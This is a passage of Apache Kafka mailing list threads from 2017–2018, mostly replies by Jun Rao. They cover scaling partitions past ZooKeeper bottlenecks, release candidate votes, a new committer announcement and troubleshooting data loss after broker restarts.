the logging overhead (KAFKA-6116) and making the ZK accesses async
(KAFKA-5642). These won't necessarily reduce the number of requests to ZK,
but will allow better pipelining when accessing ZK.

In the normal mode, we are now discussing KIP-227, which could reduce the
overhead for replication and consumption when there are many partitions.

Jun

On Wed, Jan 3, 2018 at 1:48 PM, Andrey Falko  wrote:

> Hi everyone,
>
> We are seeing more and more push from our Kafka users to support well
> more than 10k replicated partitions. We'd ideally like to avoid running
> multiple
> clusters to keep our cluster management and monitoring simple. We started
> testing kafka to see how many replicated partitions it could handle.
>
> We found that, to maintain SLAs of under 50ms for produce latency,
> Kafka starts going downhill at around 9k topics with 5 brokers. Each topic
> is
> replicated 3x in our test. The bottleneck appears to be zookeeper:
> after a certain
> period of time, the number of outstanding requests in ZK spikes up at a
> linear rate. Slowing down the rate at which we create and produce to
> topics,
> improves things, but doing that makes the system tougher to manage and use.
> We are happy to publish our detailed results with reproduction
> steps if anyone is interested.
>
> Has anyone overcome this problem and scaled beyond 9k replicated
> partitions?
> Does anyone have zookeeper tuning suggestions? Is it even the bottleneck?
>
> According to this we should have at most 300 3x replicated per broker:
> https://www.confluent.io/blog/how-to-choose-the-number-of-
> topicspartitions-in-a-kafka-cluster/
> Is anyone doing work to have kafka support more than that?
>
> Best regards,
> Andrey Falko
> Salesforce.com
>

Re: [ANNOUNCE] New committer: Onur Karaman

2017-11-07 Thread Jun Rao

Affan,

All known problems in the controller are described in the doc linked from
https://issues.apache.org/jira/browse/KAFKA-5027.

Thanks,

Jun

On Mon, Nov 6, 2017 at 11:00 PM, Affan Syed <as...@an10.io> wrote:

> Congrats Onur,
>
> Can you also share the document where all known problems are listed; I am
> assuming these bugs are still valid for the current stable release.
>
> Affan
>
> - Affan
>
> On Mon, Nov 6, 2017 at 10:24 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Hi, everyone,
> >
> > The PMC of Apache Kafka is pleased to announce a new Kafka committer Onur
> > Karaman.
> >
> > Onur's most significant work is the improvement of Kafka controller,
> which
> > is the brain of a Kafka cluster. Over time, we have accumulated quite a
> few
> > correctness and performance issues in the controller. There have been
> > attempts to fix controller issues in isolation, which would make the code
> > base more complicated without a clear path of solving all problems. Onur
> is
> > the one who took a holistic approach, by first documenting all known
> > issues, writing down a new design, coming up with a plan to deliver the
> > changes in phases and executing on it. At this point, Onur has completed
> > the two most important phases: making the controller single threaded and
> > changing the controller to use the async ZK api. The former fixed
> multiple
> > deadlocks and race conditions. The latter significantly improved the
> > performance when there are many partitions. Experimental results show
> that
> > Onur's work reduced the controlled shutdown time by a factor of 100 times
> > and the controller failover time by a factor of 3 times.
> >
> > Congratulations, Onur!
> >
> > Thanks,
> >
> > Jun (on behalf of the Apache Kafka PMC)
> >
>

[ANNOUNCE] New committer: Onur Karaman

2017-11-06 Thread Jun Rao

Hi, everyone,

The PMC of Apache Kafka is pleased to announce a new Kafka committer Onur
Karaman.

Onur's most significant work is the improvement of Kafka controller, which
is the brain of a Kafka cluster. Over time, we have accumulated quite a few
correctness and performance issues in the controller. There have been
attempts to fix controller issues in isolation, which would make the code
base more complicated without a clear path of solving all problems. Onur is
the one who took a holistic approach, by first documenting all known
issues, writing down a new design, coming up with a plan to deliver the
changes in phases and executing on it. At this point, Onur has completed
the two most important phases: making the controller single threaded and
changing the controller to use the async ZK api. The former fixed multiple
deadlocks and race conditions. The latter significantly improved the
performance when there are many partitions. Experimental results show that
Onur's work reduced the controlled shutdown time by a factor of 100 times
and the controller failover time by a factor of 3 times.

Congratulations, Onur!

Thanks,

Jun (on behalf of the Apache Kafka PMC)

Re: [kafka-clients] [VOTE] 1.0.0 RC2

2017-10-18 Thread Jun Rao

Hi, Guozhang,

Thanks for running the release. Just a quick clarification. The statement
that "* Controller improvements: async ZK access for faster administrative
request handling" is not accurate. What's included in 1.0.0 is a logging
change improvement in the controller, which does give significant perf
benefit. However, the async ZK changes are in trunk and will be in 1.1.0.

Jun

On Tue, Oct 17, 2017 at 9:47 AM, Guozhang Wang  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the third candidate for release of Apache Kafka 1.0.0. The main
> PRs that gets merged in after RC1 are the following:
>
> https://github.com/apache/kafka/commit/dc6bfa553e73ffccd1e604963e076c
> 78d8ddcd69
>
> It's worth noting that starting in this version we are using a different
> version protocol with three digits: *major.minor.bug-fix*
>
> Any and all testing is welcome, but the following areas are worth
> highlighting:
>
> 1. Client developers should verify that their clients can produce/consume
> to/from 1.0.0 brokers (ideally with compressed and uncompressed data).
> 2. Performance and stress testing. Heroku and LinkedIn have helped with
> this in the past (and issues have been found and fixed).
> 3. End users can verify that their apps work correctly with the new
> release.
>
> This is a major version release of Apache Kafka. It includes 29 new KIPs.
> See the release notes and release plan 
> (*https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=71764913
> *)
> for more details. A few feature highlights:
>
> * Java 9 support with significantly faster TLS and CRC32C implementations
> * JBOD improvements: disk failure only disables failed disk but not the
> broker (KIP-112/KIP-113)
> * Controller improvements: async ZK access for faster administrative
> request handling
> * Newly added metrics across all the modules (KIP-164, KIP-168, KIP-187,
> KIP-188, KIP-196)
> * Kafka Streams API improvements (KIP-120 / 130 / 138 / 150 / 160 / 161),
> and drop compatibility "Evolving" annotations
>
> Release notes for the 1.0.0 release:
> *http://home.apache.org/~guozhang/kafka-1.0.0-rc2/RELEASE_NOTES.html
> *
>
>
>
> *** Please download, test and vote by Friday, October 20, 8pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> *http://home.apache.org/~guozhang/kafka-1.0.0-rc2/
> *
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> * Javadoc:
> *http://home.apache.org/~guozhang/kafka-1.0.0-rc2/javadoc/
> *
>
> * Tag to be voted upon (off 1.0 branch) is the 1.0.0-rc2 tag:
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> 51d5f12e190a38547839c7d2710c97faaeaca586
>
> * Documentation:
> Note the documentation can't be pushed live due to changes that will not go
> live until the release. You can manually verify by downloading
> http://home.apache.org/~guozhang/kafka-1.0.0-rc2/
> kafka_2.11-1.0.0-site-docs.tgz
>
> * Successful Jenkins builds for the 1.0.0 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-1.0-jdk7/40/
> System test: https://jenkins.confluent.io/job/system-test-kafka-1.0/6/
>
>
> /**
>
>
> Thanks,
> -- Guozhang
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAHwHRrXD0nLUqFV0HV_Mtz5eY%
> 2B2RhXCSk_xX1FPkHV%3D0s6u7pQ%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

Re: [kafka-clients] Re: [VOTE] 1.0.0 RC1

2017-10-16 Thread Jun Rao

Hi, Guozhang,

Onur found an existing performance bug in the controller when there are
lots of partitions. The fix is simple (
https://github.com/apache/kafka/pull/4075) and reduces the controlled
shutdown time from 6.5 mins to 30 secs, with
25K partitions, RF=2 and 5 brokers.

It would be useful to include this fix in 1.0.0.

Thanks,

Jun


On Mon, Oct 16, 2017 at 9:55 AM, Guozhang Wang  wrote:

> Hi Tom,
>
> Thanks for pointing it out. I meant to say Oct. 17th, Tuesday, for a 72
> hours period.
>
> That being said, we need to have a lazy majority to accept a release RC
> according to our bylaws (https://cwiki.apache.org/
> confluence/display/KAFKA/Bylaws). And if we cannot achieve that via
> thorough testing within the period we will automatically extend the voting
> process.
>
>
> Guozhang
>
>
>
> On Mon, Oct 16, 2017 at 5:09 AM, Thomas Crayford  > wrote:
>
>> Hi Guozhang,
>>
>> This says the due date on the testing is October 13th, which was the day
>> this email was sent. Is that accurate, or is it meant to read October
>> 17th,
>> which is next Tuesday?
>>
>> I feel like this short a testing window for a 1.0 RC is a little low, as
>> 1.0 is clearly a big announcement of stability, and folk should be given
>> enough time to do thorough testing.
>>
>> Thanks
>>
>> Tom
>>
>> On Fri, Oct 13, 2017 at 9:12 PM, Guozhang Wang 
>> wrote:
>>
>> > Hello Kafka users, developers and client-developers,
>> >
>> > This is the second candidate for release of Apache Kafka 1.0.0.
>> >
>> > It's worth noting that starting in this version we are using a different
>> > version protocol with three digits: *major.minor.bug-fix*
>> >
>> > Any and all testing is welcome, but the following areas are worth
>> > highlighting:
>> >
>> > 1. Client developers should verify that their clients can
>> produce/consume
>> > to/from 1.0.0 brokers (ideally with compressed and uncompressed data).
>> > 2. Performance and stress testing. Heroku and LinkedIn have helped with
>> > this in the past (and issues have been found and fixed).
>> > 3. End users can verify that their apps work correctly with the new
>> > release.
>> >
>> > This is a major version release of Apache Kafka. It includes 29 new
>> KIPs.
>> > See the release notes and release plan
>> > (*https://cwiki.apache.org/confluence/pages/viewpage.
>> > action?pageId=71764913
>> > > pageId=71764913
>> > >*)
>> > for more details. A few feature highlights:
>> >
>> > * Java 9 support with significantly faster TLS and CRC32C
>> implementations
>> > (KIP)
>> > * JBOD improvements: disk failure only disables failed disk but not the
>> > broker (KIP-112/KIP-113)
>> > * Newly added metrics across all the modules (KIP-164, KIP-168, KIP-187,
>> > KIP-188, KIP-196)
>> > * Kafka Streams API improvements (KIP-120 / 130 / 138 / 150 / 160 /
>> 161),
>> > and drop compatibility "Evolving" annotations
>> >
>> > Release notes for the 1.0.0 release:
>> > *http://home.apache.org/~guozhang/kafka-1.0.0-rc1/RELEASE_NOTES.html
>> > *
>> >
>> >
>> >
>> > *** Please download, test and vote by Tuesday, October 13, 8pm PT
>> >
>> > Kafka's KEYS file containing PGP keys we use to sign the release:
>> > http://kafka.apache.org/KEYS
>> >
>> > * Release artifacts to be voted upon (source and binary):
>> > *http://home.apache.org/~guozhang/kafka-1.0.0-rc1/
>> > *
>> >
>> > * Maven artifacts to be voted upon:
>> > https://repository.apache.org/content/groups/staging/org/apache/kafka/
>> >
>> > * Javadoc:
>> > *http://home.apache.org/~guozhang/kafka-1.0.0-rc1/javadoc/
>> > *
>> >
>> > * Tag to be voted upon (off 1.0 branch) is the 1.0.0-rc1 tag:
>> >
>> > https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
>> > 9424d29dbf0a3c538215b0b98b1e6b956481e4d5
>> >
>> > * Documentation:
>> > Note the documentation can't be pushed live due to changes that will
>> not go
>> > live until the release. You can manually verify by downloading
>> > http://home.apache.org/~guozhang/kafka-1.0.0-rc1/
>> > kafka_2.11-1.0.0-site-docs.tgz
>> >
>> > * Successful Jenkins builds for the 1.0.0 branch:
>> > Unit/integration tests: https://builds.apache.org/job/
>> kafka-1.0-jdk7/31/
>> > System test: https://jenkins.confluent.io/job/system-test-kafka-1.0/1/
>> >
>> >
>> > /**
>> >
>> >
>> > Thanks,
>> > -- Guozhang
>> >
>>
>
>
>
> --
> -- Guozhang
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at

Re: [VOTE] 0.11.0.1 RC0

2017-09-11 Thread Jun Rao

Hi, Damian,

Thanks for running the release. Verified the quickstart from the src
distribution. +1

Jun

On Tue, Sep 5, 2017 at 1:34 PM, Damian Guy  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the first candidate for release of Apache Kafka 0.11.0.1.
>
> This is a bug fix release and it includes fixes and improvements from 49
> JIRAs (including a few critical bugs).
>
> Release notes for the 0.11.0.1 release:
> http://home.apache.org/~damianguy/kafka-0.11.0.1-rc0/RELEASE_NOTES.html
>
> *** Please download, test and vote by Saturday, September 9, 9am PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~damianguy/kafka-0.11.0.1-rc0/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~damianguy/kafka-0.11.0.1-rc0/javadoc/
>
> * Tag to be voted upon (off 0.11.0 branch) is the 0.11.0.1 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> a8aa61266aedcf62e45b3595a2cf68c819ca1a6c
>
>
> * Documentation:
> Note the documentation can't be pushed live due to changes that will not go
> live until the release. You can manually verify by downloading
> http://home.apache.org/~damianguy/kafka-0.11.0.1-rc0/
> kafka_2.11-0.11.0.1-site-docs.tgz
>
>
> * Protocol:
> http://kafka.apache.org/0110/protocol.html
>
> * Successful Jenkins builds for the 0.11.0 branch:
> Unit/integration tests: https://builds.apache.org/job/
> kafka-0.11.0-jdk7/298
>
> System tests:
> http://confluent-kafka-0-11-0-system-test-results.s3-us-
> west-2.amazonaws.com/2017-09-05--001.1504612096--apache--0.
> 11.0--7b6e5f9/report.html
>
> /**
>
> Thanks,
> Damian
>

Re: [ANNOUNCE] Apache Kafka 0.11.0.0 Released

2017-06-28 Thread Jun Rao

Hi, Ismael,

Thanks a lot for running this release!

Jun

On Wed, Jun 28, 2017 at 5:52 PM, Ismael Juma <ij...@apache.org> wrote:

> The Apache Kafka community is pleased to announce the release for Apache
> Kafka 0.11.0.0. This is a feature release which includes the completion
> of 32 KIPs, over 400 bug fixes and improvements, and more than 700 pull
> requests merged.
>
> All of the changes in this release can be found in the release notes:
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/RELEASE_NOTES.html
> (this is a link to a mirror due to temporary issues affecting
> archive.apache.org)
>
> Apache Kafka is a distributed streaming platform with five core APIs:
>
> ** The Producer API allows an application to publish a stream records to
> one or more Kafka topics.
>
> ** The Consumer API allows an application to subscribe to one or more
> topics and process the stream of records produced to them.
>
> ** The Streams API allows an application to act as a stream processor,
> consuming an input stream from one or more topics and producing an
> output stream to one or more output topics, effectively transforming the
> input
> streams to output streams.
>
> ** The Connector API allows building and running reusable producers or
> consumers that connect Kafka topics to existing applications or data
> systems. For example, a connector to a relational database might capture
> every change to a table.
>
> ** The AdminClient API allows managing and inspecting topics, brokers, acls
> and other Kafka objects.
>
> With these APIs, Kafka can be used for two broad classes of application:
>
> ** Building real-time streaming data pipelines that reliably get data
> between systems or applications.
>
> ** Building real-time streaming applications that transform or react to
> the streams of data.
>
> You can download the source release from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka-0.11.0.0-src.tgz
>
> and binary releases from
> *https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka_2.11-0.11.0.0.tgz
> <https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka_2.11-0.11.0.0.tgz>*
>
> *https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka_2.12-0.11.0.0.tgz
> <https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka_2.12-0.11.0.0.tgz>*
> Thanks to the 118 contributors on this release!
>
> Aaron Coburn, Adrian McCague, Aegeaner, Akash Sethi, Akhilesh Naidu, Alex
> Loddengaard, Allen Xiang, amethystic, Amit Daga, Andrew Olson, Andrey
> Dyachkov, anukin, Apurva Mehta, Armin Braun, Balint Molnar, Ben Stopford,
> Bernard Leach, Bharat Viswanadham, Bill Bejeck, Bruce Szalwinski, Chris
> Egerton, Christopher L. Shannon, Clemens Valiente, Colin P. Mccabe, Dale
> Peakall, Damian Guy, dan norwood, Dana Powers, Davor Poldrugo, dejan2609,
> Dhwani Katagade, Dong Lin, Dustin Cote, Edoardo Comar, Eno Thereska, Ewen
> Cheslack-Postava, gosubpl, Grant Henke, Guozhang Wang, Gwen Shapira,
> Hamidreza Afzali, Hao Chen, hejiefang, Hojjat Jafarpour, huxi, Ismael Juma,
> Ivan A. Melnikov, Jaikiran Pai, James Cheng, James Chien, Jan Lukavsky,
> Jason Gustafson, Jean-Philippe Daigle, Jeff Chao, Jeff Widman, Jeyhun
> Karimov, Jiangjie Qin, Jon Freedman, Jonathan Monette, Jorge Quilcate,
> jozi-k, Jun Rao, Kamal C, Kelvin Rutt, Kevin Sweeney, Konstantine
> Karantasis, Kyle Winkelman, Lihua Xin, Magnus Edenhill, Magnus Reftel,
> Manikumar Reddy O, Marco Ebert, Mario Molina, Matthias J. Sax, Maysam
> Yabandeh, Michael Andre Pearce, Michael G. Noll, Michal Borowiecki, Mickael
> Maison, Nick Pillitteri, Nikki Thean, Onur Karaman, Paolo Patierno,
> pengwei-li, Prabhat Kashyap, Qihuang Zheng, radai-rosenblatt, Raghav Kumar
> Gautam, Rajini Sivaram, Randall Hauch, Ryan P, Sachin Mittal, Sandesh K,
> Satish Duggana, Sean McCauliff, sharad-develop, Shikhar Bhushan, shuguo
> zheng, Shun Takebayashi, simplesteph, Steven Schlansker, Stevo Slavic,
> sunnykrgupta, Sönke Liebau, Tim Carey-Smith, Tom Bentley, Tommy Becker,
> Umesh Chaudhary, Vahid Hashemian, Vitaly Pushkar, Vogeti, Will Droste, Will
> Marshall, Wim Van Leuven, Xavier Léauté, Xi Hu, xinlihua, Yuto Kawamura
>
> We welcome your help and feedback. For more information on how to
> report problems, and to get involved, visit the project website at
> http://kafka.apache.org/
>
> Thanks,
> Ismael
>

Re: [kafka-clients] Re: [VOTE] 0.11.0.0 RC2

2017-06-26 Thread Jun Rao

Hi, Ismael,

Thanks for running the release. +1. Verified quickstart on the 2.11 binary.

Jun

On Mon, Jun 26, 2017 at 3:53 PM, Ismael Juma  wrote:

> Hi Vahid,
>
> There are a few known issues when running Kafka on Windows. A PR with some
> fixes is: https://github.com/apache/kafka/pull/3283. The fact that the
> index cannot be accessed indicates that it may be a similar issue. I
> suggest we move this discussion to the relevant JIRAs instead of the
> release thread.
>
> Ismael
>
> On Mon, Jun 26, 2017 at 11:25 PM, Vahid S Hashemian <
> vahidhashem...@us.ibm.com> wrote:
>
>> Hi Ismael,
>>
>> This is the output of core tests from the start until the first failed
>> test.
>>
>> kafka.admin.AdminRackAwareTest > testAssignmentWithRackAwareWithUnevenRacks
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testAssignmentWith2ReplicasRackAware
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > 
>> testAssignmentWithRackAwareWithUnevenReplicas
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testSkipBrokerWithReplicaAlreadyAssigned
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testAssignmentWithRackAware PASSED
>>
>> kafka.admin.AdminRackAwareTest > testRackAwareExpansion PASSED
>>
>> kafka.admin.AdminRackAwareTest > 
>> testAssignmentWith2ReplicasRackAwareWith6Partitions
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testAssignmentWith2ReplicasRac
>> kAwareWith6PartitionsAnd3Brokers PASSED
>>
>> kafka.admin.AdminRackAwareTest > 
>> testGetRackAlternatedBrokerListAndAssignReplicasToBrokers
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testMoreReplicasThanRacks PASSED
>>
>> kafka.admin.AdminRackAwareTest > testSingleRack PASSED
>>
>> kafka.admin.AdminRackAwareTest > 
>> testAssignmentWithRackAwareWithRandomStartIndex
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testLargeNumberPartitionsAssignment
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testLessReplicasThanRacks PASSED
>>
>> kafka.admin.AclCommandTest > testInvalidAuthorizerProperty PASSED
>>
>> kafka.admin.ConfigCommandTest > testScramCredentials PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldParseArgumentsForTopicsEntityType
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > testUserClientQuotaOpts PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldAddTopicConfig PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldAddClientConfig PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldDeleteBrokerConfig PASSED
>>
>> kafka.admin.DeleteConsumerGroupTest > 
>> testGroupWideDeleteInZKDoesNothingForActiveConsumerGroup
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > testQuotaConfigEntity PASSED
>>
>> kafka.admin.ConfigCommandTest > 
>> shouldNotUpdateBrokerConfigIfMalformedBracketConfig
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldFailIfUnrecognisedEntityType PASSED
>>
>> kafka.admin.AdminTest > testBasicPreferredReplicaElection PASSED
>>
>> kafka.admin.ConfigCommandTest > 
>> shouldNotUpdateBrokerConfigIfNonExistingConfigIsDeleted
>> PASSED
>>
>> kafka.admin.AdminTest > testPreferredReplicaJsonData PASSED
>>
>> kafka.admin.BrokerApiVersionsCommandTest > checkBrokerApiVersionCommandOutput
>> PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldRemoveThrottleReplicaListBasedOnProposedAssignment PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindMovingReplicasMultipleTopics PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldNotOverwriteExistingPropertiesWhenLimitIsAdded PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindMovingReplicasMultipleTopicsAndPartitions PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldRemoveThrottleLimitFromAllBrokers PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest > shouldFindMovingReplicas
>> PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindMovingReplicasMultiplePartitions PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest > shouldSetQuotaLimit PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindMovingReplicasWhenProposedIsSubsetOfExisting PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest > shouldUpdateQuotaLimit PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindTwoMovingReplicasInSamePartition PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldNotOverwriteEntityConfigsWhenUpdatingThrottledReplicas PASSED
>>
>> kafka.admin.ConfigCommandTest > 
>> shouldNotUpdateBrokerConfigIfMalformedEntityName
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldSupportCommaSeparatedValues PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldNotUpdateBrokerConfigIfMalformedConfig
>> PASSED
>>
>> kafka.admin.DeleteConsumerGroupTest > testGroupTopicWideDeleteInZKDo
>> esNothingForActiveGroupConsumingMultipleTopics PASSED
>>
>> kafka.admin.AddPartitionsTest > testReplicaPlacementAllServers PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldParseArgumentsForBrokersEntityType
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldAddBrokerConfig PASSED
>>

Re: Data loss after a Kafka Broker restart scenario

2017-05-24 Thread Jun Rao

Hi, Fathima,

Yes, the most efficient way to verify if a message is sent successfully is
through the producer callback. You can take a look at PrintInfoCallback in
org.apache.kafka.toolsVerifiableProducer as an example. Our system tests
use that to verify if any data loss has occurred.

Thanks,

Jun

On Mon, May 22, 2017 at 2:48 AM, Fathima Amara  wrote:

> Hi Jun,
>
> Do you mean by using CallBack mechanism? Since I am new to kafka would you
> mind directing me how to do it if it's not to be done using CallBack?
>
> Fathima.
>

Re: Data loss after a Kafka Broker restart scenario

2017-05-19 Thread Jun Rao

Hi, Fathima,

Did you check if produced messages are acked successfully? Only
successfully acked messages are guaranteed to be preserved on the broker.

Thanks,

Jun

On Thu, May 18, 2017 at 12:10 AM, Fathima Amara  wrote:

> Hi Jun,
>
> Thanks alot for the reply. As suggested, I tried running my application in
> the trunk. But I still do encounter data loss! Are there any specific
> configs that I need to change from its default value? What could be the
> reason for this?
>
> Fathima
>

Re: Data loss after a Kafka Broker restart scenario

2017-05-16 Thread Jun Rao

Hi, Fathima,

There is a known data loss issue that's described in KIP-101 (
https://cwiki.apache.org/confluence/display/KAFKA/KIP-101+-+Alter+Replication+Protocol+to+use+Leader+Epoch+rather+than+High+Watermark+for+Truncation).
The issue happens rarely, but has been exposed in some of our system tests
that mimic the testing that you have been doing. KIP-101 has been fixed in
trunk and will be included in the next release (0.11.0.0) in June. Since
then, we haven't observed similar data loss issue in our system tests.

If you want to test this out now, perhaps you could rerun your test in
trunk.

Thanks,

Jun

On Tue, May 16, 2017 at 2:09 AM, Fathima Amara  wrote:

>
> Hi all,
>
> I am using Kafka 2.11-0.10.0.1 and Zookeeper 3.4.8.
> I have a cluster of 4 servers(A,B,C,D) running one kafka broker on each of
> them and, one zookeeper server on server A. Data is initially produced from
> server A using a Kafka Producer and it goes through servers B,C,D being
> subjected to processing and finally reaches server A again(gets consumed
> using a Kafka Consumer).
>
> Topics created on the end of each process has 2 partitions with a
> replication-factor of 3. Other configurations include,
> unclean.leader.election.enable=false
> acks=all
> retries=0
> I let the producer run for a while in server A, then kill one of the Kafka
> brokers on the cluster(B,C,D) while data processing takes place and restart
> it. When consuming from the end of server A, I notice a considerable amount
> of data lost which varies on each run! ex:- on an input of 1 million events
> 5930 events are lost.
>
> Is the reason for this the Kafka Producer not guaranteeing Exactly-once
> processing or is this due to some other reason? what other reasons cause
> data loss?
>

Re: [VOTE] 0.10.2.1 RC3

2017-04-26 Thread Jun Rao

Hi, Gwen,

Thanks for doing the release. +1 from me.

Jun

On Fri, Apr 21, 2017 at 9:56 AM, Gwen Shapira  wrote:

> Hello Kafka users, developers, friends, romans, countrypersons,
>
> This is the fourth (!) candidate for release of Apache Kafka 0.10.2.1.
>
> It is a bug fix release, so we have lots of bug fixes, some super
> important.
>
> Release notes for the 0.10.2.1 release:
> http://home.apache.org/~gwenshap/kafka-0.10.2.1-rc3/RELEASE_NOTES.html
>
> *** Please download, test and vote by Wednesday, April 26, 2017 ***
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~gwenshap/kafka-0.10.2.1-rc3/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~gwenshap/kafka-0.10.2.1-rc3/javadoc/
>
> * Tag to be voted upon (off 0.10.2 branch) is the 0.10.2.1 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> 8e4f09caeaa877f06dc75c7da1af7a727e5e599f
>
>
> * Documentation:
> http://kafka.apache.org/0102/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0102/protocol.html
>
> /**
>
> Your help in validating this bugfix release is super valuable, so
> please take the time to test and vote!
>
> Suggested tests:
>  * Grab the source archive and make sure it compiles
>  * Grab one of the binary distros and run the quickstarts against them
>  * Extract and verify one of the site docs jars
>  * Build a sample against jars in the staging repo
>  * Validate GPG signatures on at least one file
>  * Validate the javadocs look ok
>  * The 0.10.2 documentation was updated for this bugfix release
> (especially upgrade, streams and connect portions) - please make sure
> it looks ok: http://kafka.apache.org/documentation.html
>
> But above all, try to avoid finding new bugs - we want to get this release
> out the door already :P
>
>
> Thanks,
> Gwen
>
>
>
> --
> *Gwen Shapira*
> Product Manager | Confluent
> 650.450.2760 | @gwenshap
> Follow us: Twitter  | blog
> 
>

Re: [ANNOUNCE] New committer: Rajini Sivaram

2017-04-24 Thread Jun Rao

Congratulations, Rajini ! Thanks for all your contributions.

Jun

On Mon, Apr 24, 2017 at 2:06 PM, Gwen Shapira  wrote:

> The PMC for Apache Kafka has invited Rajini Sivaram as a committer and we
> are pleased to announce that she has accepted!
>
> Rajini contributed 83 patches, 8 KIPs (all security and quota
> improvements) and a significant number of reviews. She is also on the
> conference committee for Kafka Summit, where she helped select content
> for our community event. Through her contributions she's shown good
> judgement, good coding skills, willingness to work with the community on
> finding the best
> solutions and very consistent follow through on her work.
>
> Thank you for your contributions, Rajini! Looking forward to many more :)
>
> Gwen, for the Apache Kafka PMC
>

Re: Re: ZK and Kafka failover testing

2017-04-19 Thread Jun Rao

Hi, Shri,

As Onur explained, if ZK is down, Kafka can still work, but won't be able
to react to actual broker failures until ZK is up again. So if a broker is
down in that window, some of the partitions may not be ready for read or
write.

As for the duplicates in the consumer, Hans had a good point. It would be
useful to see if the duplicates are introduced by the producer or the
consumer. Perhaps you can read the log again and see if duplicates are in
the log in the first place. Note that broker retries can introduce
duplicates.

Hi, Onur,

For the data loss issue that you mentioned, that should only happen with
acks=1. As we discussed offline, if acks=all is used and unclean leader
election is disabled, acked messages shouldn't be lost.

Thanks,

Jun


On Wed, Apr 19, 2017 at 10:19 AM, Onur Karaman  wrote:

> If this is what I think it is, it has nothing to do with acks,
> max.in.flight.requests.per.connection, or anything client-side and is
> purely about the kafka cluster.
>
> Here's a simple example involving a single zookeeper instance, 3 brokers, a
> KafkaConsumer and KafkaProducer (neither of these clients interact with
> zookeeper).
> 1. start up zookeeper:
> > ./bin/zookeeper-server-start.sh config/zookeeper.properties
>
> 2. start up some brokers:
> > ./bin/kafka-server-start.sh config/server0.properties
> > ./bin/kafka-server-start.sh config/server1.properties
> > ./bin/kafka-server-start.sh config/server2.properties
>
> 3 create a topic:
> > ./bin/kafka-topics.sh --zookeeper localhost:2181 --create --topic t
> --partitions 1 --replication-factor 3
>
> 4. start a console consumer (this needs to happen before step 5 so we can
> write __consumer_offsets metadata to zookeeper):
> > ./bin/kafka-console-consumer.sh --broker-list
> localhost:9090,localhost:9091,localhost:9092 --topic t
>
> 5. kill zookeeper
>
